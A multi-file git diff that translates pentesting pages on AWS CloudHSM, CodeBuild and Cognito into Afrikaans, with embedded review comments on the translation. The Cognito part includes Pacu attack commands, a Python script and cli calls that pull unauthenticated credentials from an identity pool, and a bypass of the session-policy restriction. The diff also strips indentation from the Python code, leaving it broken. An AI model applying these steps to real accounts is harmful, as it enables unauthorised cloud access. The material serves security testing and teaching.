Die koste word vermenigvuldig met soveel CloudHSM toestelle wat benodig word om jou spesifieke vereistes te bereik.\ +Boonop moet kruis oorweging gemaak word in die aankoop van derdeparty sagteware soos SafeNet ProtectV sagteware suites en integrasietyd en -poging. Sleutelbestuurdiens is 'n gebruik gebaseerde diens en hang af van die aantal sleutels wat jy het en die invoer- en uitvoerbedrywighede. Aangesien sleutelbestuur naatlose integrasie met baie AWS dienste bied, moet integrasiekoste aansienlik laer wees. Koste moet as 'n sekondĂȘre faktor in versleuteling oplossings beskou word. Versleuteling word tipies gebruik vir sekuriteit en nakoming. -**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you. +**Met CloudHSM het net jy toegang tot die sleutels** en sonder om in te veel detail te gaan, met CloudHSM bestuur jy jou eie sleutels. **Met KMS bestuur jy en Amazon jou sleutels saam**. AWS het baie beleidsbeskermings teen misbruik en **kan steeds nie jou sleutels in enige oplossing toegang nie**. Die hoofonderskeid is nakoming soos dit betrekking het op sleutelbesit en bestuur, en met CloudHSM, is dit 'n hardeware toestel wat jy bestuur en onderhou met eksklusiewe toegang tot jou en net jou. -### CloudHSM Suggestions +### CloudHSM Voorstelle -1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS. -2. Be careful when **initializing** a **CloudHSM**. 
This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data. -3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear. -4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed. -5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool. -6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance. -7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source. +1. Ontplooi altyd CloudHSM in 'n **HA-opstelling** met ten minste twee toestelle in **verskillende beskikbaarheids sones**, en indien moontlik, ontplooi 'n derde of op die perseel of in 'n ander streek by AWS. +2. Wees versigtig wanneer jy 'n **CloudHSM** **initieer**. Hierdie aksie **sal die sleutels vernietig**, so of jy moet 'n ander kopie van die sleutels hĂȘ of absoluut seker wees dat jy nie en nooit, ooit hierdie sleutels sal benodig om enige data te ontsleutel nie. +3. CloudHSM ondersteun slegs **sekere weergawes van firmware** en sagteware. 
Voordat jy enige opdatering uitvoer, maak seker dat die firmware en of sagteware deur AWS ondersteun word. Jy kan altyd AWS ondersteuning kontak om te verifieer of die opgraderingsgids onduidelik is. +4. Die **netwerk konfigurasie mag nooit verander word nie.** Onthou, dit is in 'n AWS datacentrum en AWS monitor basishardeware vir jou. Dit beteken dat as die hardeware faal, hulle dit vir jou sal vervang, maar net as hulle weet dit het gefaal. +5. Die **SysLog voortgang mag nie verwyder of verander word nie**. Jy kan altyd 'n SysLog voortgangsverskaffer **byvoeg** om die logs na jou eie versamelingsinstrument te rig. +6. Die **SNMP** konfigurasie het dieselfde basiese beperkings as die netwerk en SysLog vouer. Dit **mag nie verander of verwyder word nie**. 'n **Addisionele** SNMP konfigurasie is reg, maak net seker jy verander nie die een wat reeds op die toestel is nie. +7. Nog 'n interessante beste praktyk van AWS is **om nie die NTP konfigurasie te verander nie**. Dit is nie duidelik wat sou gebeur as jy dit doen nie, so hou in gedagte dat as jy nie dieselfde NTP konfigurasie vir die res van jou oplossing gebruik nie, jy dalk twee tydbronne kan hĂȘ. Wees net bewus hiervan en weet dat die CloudHSM by die bestaande NTP bron moet bly. -The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month. +Die aanvanklike bekendstellingskoste vir CloudHSM is $5,000 om die hardeware toestel wat aan jou gebruik toegewy is, toe te ken, dan is daar 'n uurlikse koste verbonde aan die werking van CloudHSM wat tans $1.88 per uur van werking is, of ongeveer $1,373 per maand. -The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**. 
+Die mees algemene rede om CloudHSM te gebruik, is nakomingsstandaarde wat jy moet nakom vir regulerende redes. **KMS bied nie datasteun vir asimmetriese sleutels aan nie. CloudHSM laat jou toe om asimmetriese sleutels veilig te stoor**. -The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH. +Die **publieke sleutel word op die HSM toestel tydens voorsiening geĂŻnstalleer** sodat jy toegang tot die CloudHSM instansie via SSH kan verkry. -### What is a Hardware Security Module +### Wat is 'n Hardware Security Module -A hardware security module (HSM) is a dedicated cryptographic device that is used to generate, store, and manage cryptographic keys and protect sensitive data. It is designed to provide a high level of security by physically and electronically isolating the cryptographic functions from the rest of the system. +'n Hardware security module (HSM) is 'n toegewyde kriptografiese toestel wat gebruik word om kriptografiese sleutels te genereer, te stoor en te bestuur en sensitiewe data te beskerm. Dit is ontwerp om 'n hoĂ« vlak van sekuriteit te bied deur die kriptografiese funksies fisies en elektronies van die res van die stelsel te isoleer. -The way an HSM works can vary depending on the specific model and manufacturer, but generally, the following steps occur: +Die manier waarop 'n HSM werk, kan wissel afhangende van die spesifieke model en vervaardiger, maar oor die algemeen vind die volgende stappe plaas: -1. **Key generation**: The HSM generates a random cryptographic key using a secure random number generator. -2. **Key storage**: The key is **stored securely within the HSM, where it can only be accessed by authorized users or processes**. -3. **Key management**: The HSM provides a range of key management functions, including key rotation, backup, and revocation. -4. 
**Cryptographic operations**: The HSM performs a range of cryptographic operations, including encryption, decryption, digital signature, and key exchange. These operations are **performed within the secure environment of the HSM**, which protects against unauthorized access and tampering. -5. **Audit logging**: The HSM logs all cryptographic operations and access attempts, which can be used for compliance and security auditing purposes. +1. **Sleutelgenerasie**: Die HSM genereer 'n ewekansige kriptografiese sleutel met behulp van 'n veilige ewekansige nommer generator. +2. **Sleutelberging**: Die sleutel word **veilig binne die HSM gestoor, waar dit slegs deur gemagtigde gebruikers of prosesse toegang kan verkry**. +3. **Sleutelbestuur**: Die HSM bied 'n reeks sleutelbestuur funksies, insluitend sleutelrotasie, rugsteun en herroeping. +4. **Kriptografiese bedrywighede**: Die HSM voer 'n reeks kriptografiese bedrywighede uit, insluitend versleuteling, ontsleuteling, digitale handtekening en sleuteluitruiling. Hierdie bedrywighede word **binne die veilige omgewing van die HSM uitgevoer**, wat teen ongeoorloofde toegang en vervalsing beskerm. +5. **Auditskryf**: Die HSM registreer alle kriptografiese bedrywighede en toegangspogings, wat gebruik kan word vir nakoming en sekuriteitsouditdoeleindes. -HSMs can be used for a wide range of applications, including secure online transactions, digital certificates, secure communications, and data encryption. They are often used in industries that require a high level of security, such as finance, healthcare, and government. +HSM's kan vir 'n wye reeks toepassings gebruik word, insluitend veilige aanlyn transaksies, digitale sertifikate, veilige kommunikasie en dataversleuteling. Hulle word dikwels in bedrywe gebruik wat 'n hoĂ« vlak van sekuriteit vereis, soos finansies, gesondheidsorg en regering. 
-Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure. +Oor die algemeen maak die hoĂ« vlak van sekuriteit wat deur HSM's verskaf word, dit **baie moeilik om rou sleutels daaruit te onttrek, en om dit te probeer, word dikwels beskou as 'n oortreding van sekuriteit**. Daar mag egter **sekere scenario's** wees waar 'n **rou sleutel deur gemagtigde personeel onttrek kan word** vir spesifieke doeleindes, soos in die geval van 'n sleutelherstelprosedure. ### Enumeration - ``` TODO ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md index bd54cd791..9af1e31ba 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md 
@@ -4,30 +4,29 @@ ## CodeBuild -AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass: +AWS **CodeBuild** word erken as 'n **volledig bestuurde deurlopende integrasiediens**. Die primĂȘre doel van hierdie diens is om die volgorde van die kompilering van bronkode, die uitvoering van toetse en die verpakking van die sagteware vir ontplooiing te outomatiseer. Die voornaamste voordeel wat deur CodeBuild aangebied word, lĂȘ in sy vermoĂ« om die behoefte aan gebruikers om hul boubedieners te voorsien, te bestuur en te skaal, te verlig. Hierdie gerief is omdat die diens self hierdie take bestuur. EssensiĂ«le kenmerke van AWS CodeBuild sluit in: -1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance. -2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process. -3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment. +1. **Bestuurde Diens**: CodeBuild bestuur en skaal die boubedieners, wat gebruikers vrymaak van bedieneronderhoud. +2. **Deurlopende Integrasie**: Dit integreer met die ontwikkeling en ontplooiing werkvloei, wat die bou- en toetsfases van die sagtewarevrystellingsproses outomatiseer. +3. **Pakketproduksie**: Na die bou- en toetsfases, berei dit die sagtewarepakkette voor, wat dit gereed maak vir ontplooiing. 
-AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability. +AWS CodeBuild integreer naatloos met ander AWS-dienste, wat die doeltreffendheid en betroubaarheid van die CI/CD (Deurlopende Integrasie/Deurlopende Ontplooiing) pyplyn verbeter. -### **Github/Gitlab/Bitbucket Credentials** +### **Github/Gitlab/Bitbucket Kredensiale** -#### **Default source credentials** +#### **Standaard bronkredensiale** -This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials. +Dit is die nalatenskapopsie waar dit moontlik is om 'n paar **toegang** (soos 'n Github-token of -toepassing) te konfigureer wat **oor codebuild-projekte gedeel sal word**, sodat al die projekte hierdie geconfigureerde stel kredensiale kan gebruik. -The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs. +Die gestoor kredensiale (tokens, wagwoorde...) word **deur codebuild bestuur** en daar is geen openbare manier om dit van AWS API's te onttrek nie. -#### Custom source credential +#### Pasgemaakte bronkredensiaal -Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**. +Afhangende van die bergingsplatform (Github, Gitlab en Bitbucket) word verskillende opsies aangebied. Maar in die algemeen, enige opsie wat vereis om 'n **token of 'n wagwoord te stoor, sal dit as 'n geheim in die geheime bestuurder stoor**. -This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one. 
+Dit stel **verskillende codebuild-projekte in staat om verskillende geconfigureerde toegang te gebruik** tot die verskaffers in plaas van net die geconfigureerde standaard een te gebruik. ### Enumeration - ```bash # List external repo creds (such as github tokens) ## It doesn't return the token but just the ARN where it's located @@ -48,10 +47,9 @@ aws codebuild list-build-batches-for-project --project-name aws codebuild list-reports aws codebuild describe-test-cases --report-arn ``` - ### Privesc -In the following page, you can check how to **abuse codebuild permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **kodebou toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-codebuild-privesc.md @@ -74,7 +72,3 @@ In the following page, you can check how to **abuse codebuild permissions to esc - [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md index c870c1791..d6c1eff16 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md 
@@ -4,31 +4,30 @@ ## Cognito -Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. +Amazon Cognito word gebruik vir **authentisering, autorisering, en gebruikersbestuur** in web- en mobiele toepassings. Dit bied gebruikers die buigsaamheid om in te teken of direk met 'n **gebruikersnaam en wagwoord** of indirek deur 'n **derde party**, insluitend Facebook, Amazon, Google, of Apple. -Central to Amazon Cognito are two primary components: +Sentraal tot Amazon Cognito is twee primĂȘre komponente: -1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. -2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. +1. **Gebruikerspoele**: Dit is gidse wat ontwerp is vir jou app-gebruikers, wat **aanmeld- en registrasiefunksies** bied. +2. **Identiteitspoele**: Hierdie poele is instrumenteel in **die autorisering van gebruikers om toegang tot verskillende AWS-dienste te verkry**. Hulle is nie direk betrokke by die aanmeld- of registrasieproses nie, maar is van kardinale belang vir hulpbron toegang na authentisering. 
-### **User pools** +### **Gebruikerspoele** -To learn what is a **Cognito User Pool check**: +Om te leer wat 'n **Cognito Gebruikerspoel kontroleer**: {{#ref}} cognito-user-pools.md {{#endref}} -### **Identity pools** +### **Identiteitspoele** -The learn what is a **Cognito Identity Pool check**: +Om te leer wat 'n **Cognito Identiteitspoel kontroleer**: {{#ref}} cognito-identity-pools.md {{#endref}} -## Enumeration - +## Enumerasie ```bash # List Identity Pools aws cognito-identity list-identity-pools --max-results 60 
@@ -72,14 +71,13 @@ aws cognito-idp get-user-pool-mfa-config --user-pool-id ## Get risk configuration aws cognito-idp describe-risk-configuration --user-pool-id ``` +### Identiteit Pools - Ongeauthentiseerde Enumerasie -### Identity Pools - Unauthenticated Enumeration +Net **om die Identiteit Pool ID** te weet, mag jy in staat wees om **akkrediteer te verkry van die rol wat aan ongeauthentiseerde** gebruikers gekoppel is (indien enige). [**Kyk hoe hier**](cognito-identity-pools.md#accessing-iam-roles). -Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles). +### Gebruiker Pools - Ongeauthentiseerde Enumerasie -### User Pools - Unauthenticated Enumeration - -Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.** +Selfs as jy **nie 'n geldige gebruikersnaam** binne Cognito weet nie, mag jy in staat wees om **te enumereer** geldige **gebruikersname**, **BF** die **wagwoorde** of selfs **'n nuwe gebruiker te registreer** net **om die App kliĂ«nt ID** te weet (wat gewoonlik in die bronkode gevind word). [**Kyk hoe hier**](cognito-user-pools.md#registration)**.** ## Privesc @@ -87,20 +85,16 @@ Even if you **don't know a valid username** inside Cognito, you might be able to ../../aws-privilege-escalation/aws-cognito-privesc.md {{#endref}} -## Unauthenticated Access +## Ongeauthentiseerde Toegang {{#ref}} ../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md {{#endref}} -## Persistence +## Volharding {{#ref}} ../../aws-persistence/aws-cognito-persistence.md {{#endref}} {{#include ../../../../banners/hacktricks-training.md}} - - - - 
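Review bot: in the `@@ -4,31 +4,30 @@` hunk of aws-cognito-enum/README.md the two lead-ins `Om te leer wat 'n **Cognito Gebruikerspoel kontroleer**:` and `Om te leer wat 'n **Cognito Identiteitspoel kontroleer**:` mistranslate the source. In `To learn what is a Cognito User Pool check:` the word "check" is the imperative pointing the reader at the linked page, not something the pool does; as translated the sentence reads "to learn what a Cognito User Pool checks". Suggest `Om te leer wat 'n **Cognito Gebruikerspoel** is, kyk:` and the same shape for the identity pool. The same hunk introduces `authentisering, autorisering` for authentication/authorization, while later hunks in this PR use `verifikasie`, `geverifieer`, `ongeoutentiseerde` and `Ongeauthentiseerde` for the same concepts; pick one term per concept and use it across the page.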
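Review bot: in the `@@ -72,14 +71,13 @@` hunk the sentence `mag jy in staat wees om **akkrediteer te verkry van die rol ...` uses `akkrediteer`, a verb (to accredit), where the source has the noun `credentials`; the PR renders the same noun elsewhere as `kredensiale`, `geloofsbriewe` and `akkrediteerings`. Settle on one noun (`geloofsbriewe` or `kredensiale`) and use it here and in the other files. The heading `### Identiteit Pools - Ongeauthentiseerde Enumerasie` also mixes an untranslated `Pools` with the `Identiteitspoele` used in the hunk above it, and `Ongeauthentiseerde` differs from the `Ongeoutentiseerde` spelling this same PR uses in cognito-identity-pools.md.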
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md index 024c7ea91..8a07299fe 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md 
@@ -4,14 +4,13 @@ ## Basic Information -Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. The supported identity providers include: - -- Amazon Cognito user pools -- Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple -- Providers compliant with OpenID Connect (OIDC) -- SAML (Security Assertion Markup Language) identity providers -- Developer authenticated identities +Identiteitspoele speel 'n belangrike rol deur jou gebruikers in staat te stel om **tydelike geloofsbriewe** te **verkry**. Hierdie geloofsbriewe is noodsaaklik vir toegang tot verskeie AWS-dienste, insluitend maar nie beperk tot Amazon S3 en DynamoDB nie. 'n Opmerkelijke kenmerk van identiteitspoele is hul ondersteuning vir beide anonieme gasgebruikers en 'n verskeidenheid identiteitsverskaffers vir gebruikersverifikasie. Die ondersteunde identiteitsverskaffers sluit in: +- Amazon Cognito gebruikerspoele +- Sosiale aanmeldopsies soos Facebook, Google, Aanmeld met Amazon, en Meld aan met Apple +- Verskaffers wat voldoen aan OpenID Connect (OIDC) +- SAML (Security Assertion Markup Language) identiteitsverskaffers +- Ontwikkelaar geverifieerde identiteite ```python # Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows: import boto3 
@@ -24,74 +23,64 @@ identity_pool_id = 'your-identity-pool-id' # Add an identity provider to the identity pool response = client.set_identity_pool_roles( - IdentityPoolId=identity_pool_id, - Roles={ - 'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole', - 'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole', - } +IdentityPoolId=identity_pool_id, +Roles={ +'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole', +'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole', +} ) # Print the response from AWS print(response) ``` - ### Cognito Sync -To generate Identity Pool sessions, you first need to **generate and Identity ID**. This Identity ID is the **identification of the session of that user**. These identifications can have up to 20 datasets that can store up to 1MB of key-value pairs. +Om Identiteit Pool sessies te genereer, moet jy eers **'n Identiteit ID genereer**. Hierdie Identiteit ID is die **identifikasie van die sessie van daardie gebruiker**. Hierdie identifikasies kan tot 20 datasets hĂȘ wat tot 1MB van sleutel-waarde pare kan stoor. -This is **useful to keep information of a user** (who will be always using the same Identity ID). +Dit is **nuttig om inligting van 'n gebruiker te hou** (wat altyd dieselfde Identiteit ID sal gebruik). -Moreover, the service **cognito-sync** is the service that allow to **manage and syncronize this information** (in the datasets, sending info in streams and SNSs msgs...). +Boonop is die diens **cognito-sync** die diens wat toelaat om **hierdie inligting te bestuur en te sinkroniseer** (in die datasets, inligting in strome en SNS boodskappe te stuur...). 
### Tools for pentesting -- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +- [Pacu](https://github.com/RhinoSecurityLabs/pacu), die AWS eksploitering raamwerk, sluit nou die "cognito\_\_enum" en "cognito\_\_attack" modules in wat die enumerasie van alle Cognito bates in 'n rekening outomatiseer en swak konfigurasies, gebruikersattributen wat vir toegangbeheer gebruik word, ens., merk, en outomatiseer ook gebruikersskepping (insluitend MFA-ondersteuning) en privilige-eskalasie gebaseer op aanpasbare pasattributen, bruikbare identiteits pool akkrediteer, aanneembare rolle in id tokens, ens. -For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. +Vir 'n beskrywing van die modules se funksies, sien deel 2 van die [blog pos](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Vir installasie instruksies, sien die hoof [Pacu](https://github.com/RhinoSecurityLabs/pacu) bladsy. 
#### Usage -Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: - +Voorbeeld van cognito\_\_attack gebruik om te probeer om 'n gebruiker te skep en alle privesc vektore teen 'n gegewe identiteits pool en gebruikerspool kliĂ«nt: ```bash Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: - +Voorbeeld cognito\_\_enum gebruik om al die gebruikerspoele, gebruikerspoel kliĂ«nte, identiteitspoele, gebruikers, ens. wat sigbaar is in die huidige AWS-rekening, te versamel: ```bash Pacu (new:test) > run cognito__enum ``` +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is 'n CLI-gereedskap in python wat verskillende aanvalle op Cognito implementeer, insluitend ongewenste rekening skep en identiteitspoel eskalasie. -- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation. - -#### Installation - +#### Installasie ```bash $ pip install cognito-scanner ``` - -#### Usage - +#### Gebruik ```bash $ cognito-scanner --help ``` - For more information check https://github.com/padok-team/cognito-scanner -## Accessing IAM Roles +## Toegang tot IAM Rolle -### Unauthenticated +### Ongeoutentiseerde -The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable). 
+Die enigste ding wat 'n aanvaller moet weet om **AWS kredensiale** in 'n Cognito-toepassing as 'n ongeoutentiseerde gebruiker te **kry**, is die **Identiteit Pool ID**, en hierdie **ID moet hardgecodeer** wees in die web/mobiele **toepassing** sodat dit dit kan gebruik. 'n ID lyk soos volg: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (dit is nie bruteforceerbaar nie). > [!TIP] -> The **IAM Cognito unathenticated role created via is called** by default `Cognito_Unauth_Role` - -If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with: +> Die **IAM Cognito ongeoutentiseerde rol wat via geskep is, word** standaard `Cognito_Unauth_Role` genoem. +As jy 'n Identiteit Pools ID hardgecodeer vind en dit ongeoutentiseerde gebruikers toelaat, kan jy AWS kredensiale kry met: ```python import requests @@ -105,8 +94,8 @@ r = requests.post(url, json=params, headers=headers) json_resp = r.json() if not "IdentityId" in json_resp: - print(f"Not valid id: {id_pool_id}") - exit +print(f"Not valid id: {id_pool_id}") +exit IdentityId = r.json()["IdentityId"] 
@@ -117,23 +106,19 @@ r = requests.post(url, json=params, headers=headers) print(r.json()) ``` - -Or you could use the following **aws cli commands**: - +Of jy kan die volgende **aws cli commands** gebruik: ```bash aws cognito-identity get-id --identity-pool-id --no-sign aws cognito-identity get-credentials-for-identity --identity-id --no-sign ``` - > [!WARNING] -> Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section. +> Let daarop dat 'n nie-geverifieerde cognito **gebruiker GEEN toestemming kan hĂȘ nie, selfs al is dit via 'n beleid toegeken**. Kontroleer die volgende afdeling. -### Enhanced vs Basic Authentication flow +### Verbeterde vs Basiese Verifikasievloei -The previous section followed the **default enhanced authentication flow**. This flow sets a **restrictive** [**session policy**](../../aws-basic-information/#session-policies) to the IAM role session generated. This policy will only allow the session to [**use the services from this list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (even if the role had access to other services). - -However, there is a way to bypass this, if the **Identity pool has "Basic (Classic) Flow" enabled**, the user will be able to obtain a session using that flow which **won't have that restrictive session policy**. +Die vorige afdeling het die **standaard verbeterde verifikasievloei** gevolg. Hierdie vloei stel 'n **beperkende** [**sessiebeleid**](../../aws-basic-information/#session-policies) in vir die IAM rol sessie wat gegenereer is. Hierdie beleid sal slegs toelaat dat die sessie [**die dienste van hierdie lys gebruik**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (selfs al het die rol toegang tot ander dienste). 
+Daar is egter 'n manier om dit te omseil; as die **Identiteitspoel "Basiese (Klassieke) Vloei" geaktiveer het**, sal die gebruiker in staat wees om 'n sessie te verkry met behulp van daardie vloei wat **nie daardie beperkende sessiebeleid sal hĂȘ nie**. ```bash # Get auth ID aws cognito-identity get-id --identity-pool-id --no-sign 
@@ -145,51 +130,46 @@ aws cognito-identity get-open-id-token --identity-id --no-sign ## If you don't know the role_arn use the previous enhanced flow to get it aws sts assume-role-with-web-identity --role-arn "arn:aws:iam:::role/" --role-session-name sessionname --web-identity-token --no-sign ``` - > [!WARNING] -> If you receive this **error**, it's because the **basic flow is not enabled (default)** +> As jy hierdie **fout** ontvang, is dit omdat die **basiese vloei nie geaktiveer is nie (standaard)** > `An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.` -Having a set of IAM credentials you should check [which access you have](../../#whoami) and try to [escalate privileges](../../aws-privilege-escalation/). +As jy 'n stel IAM-akkrediteerings het, moet jy [kontroleer watter toegang jy het](../../#whoami) en probeer om [privileges te verhoog](../../aws-privilege-escalation/). -### Authenticated +### Geverifieer > [!NOTE] -> Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials. +> Onthou dat **geverifieerde gebruikers** waarskynlik **verskillende toestemmings** toegeken sal word, so as jy kan **aanmeld binne die app**, probeer dit en kry die nuwe akkrediteerings. -There could also be **roles** available for **authenticated users accessing the Identity Poo**l. +Daar kan ook **rolle** beskikbaar wees vir **geverifieerde gebruikers wat toegang tot die Identiteitspoel** het. -For this you might need to have access to the **identity provider**. If that is a **Cognito User Pool**, maybe you can abuse the default behaviour and **create a new user yourself**. +Hiervoor mag jy toegang tot die **identiteitsverskaffer** nodig hĂȘ. As dit 'n **Cognito-gebruikerspoel** is, kan jy dalk die standaardgedrag misbruik en **self 'n nuwe gebruiker skep**. 
> [!TIP] -> The **IAM Cognito athenticated role created via is called** by default `Cognito_Auth_Role` +> Die **IAM Cognito geverifieerde rol wat via geskep is, word standaard** `Cognito_Auth_Role` genoem. -Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured). +In elk geval, die **volgende voorbeeld** verwag dat jy reeds binne 'n **Cognito-gebruikerspoel** aangemeld het wat gebruik word om toegang tot die Identiteitspoel te verkry (moet nie vergeet dat ander tipes identiteitsverskaffers ook gekonfigureer kan word nie).
aws cognito-identity get-id \
-    --identity-pool-id <identity_pool_id> \
-    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+--identity-pool-id <identity_pool_id> \
+--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
-# Get the identity_id from the previous commnad response
+# Kry die identity_id van die vorige opdrag se antwoord
 aws cognito-identity get-credentials-for-identity \
-    --identity-id <identity_id> \
-    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+--identity-id <identity_id> \
+--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
 
-# In the IdToken you can find roles a user has access because of User Pool Groups
-# User the --custom-role-arn to get credentials to a specific role
+# In die IdToken kan jy rolle vind waartoe 'n gebruiker toegang het as gevolg van Gebruikerspoel Groepe
+# Gebruik die --custom-role-arn om akkrediteerings vir 'n spesifieke rol te kry
